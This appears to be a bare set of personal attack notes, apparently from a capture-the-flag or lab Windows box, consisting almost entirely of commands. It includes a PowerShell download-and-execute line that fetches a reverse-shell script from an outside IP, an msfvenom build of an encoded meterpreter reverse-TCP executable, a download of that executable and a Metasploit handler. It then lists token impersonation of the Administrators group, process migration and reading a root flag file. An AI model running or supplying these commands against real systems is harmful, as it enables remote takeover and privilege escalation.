Simon McCabe

powershell iex (New-Object Net.WebClient).DownloadString(‘hxxp://10.11.3.40:80/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp
 -Reverse -IPAddress 10.11.3.40 -Port 4444

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –encoder x86/shikata_ga_nai LHOST=10.11.3.40 LPORT=4445 -f exe -o malicious.exe

powershell “(New-Object System.Net.WebClient).Downloadfile(‘hxxp://10.11.3.40:80/malicious.exe’,’malicious.exe’)”

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.11.3.40 set LPORT 4445 run

Start-Process “malicious.exe”

whoami /priv

use incognito

list_tokens -g

impersonate_token “BUILTIN\Administrators”

ps

migrate to services.msc

search -f root

shell

type c:\Windows\System32\config\root.txt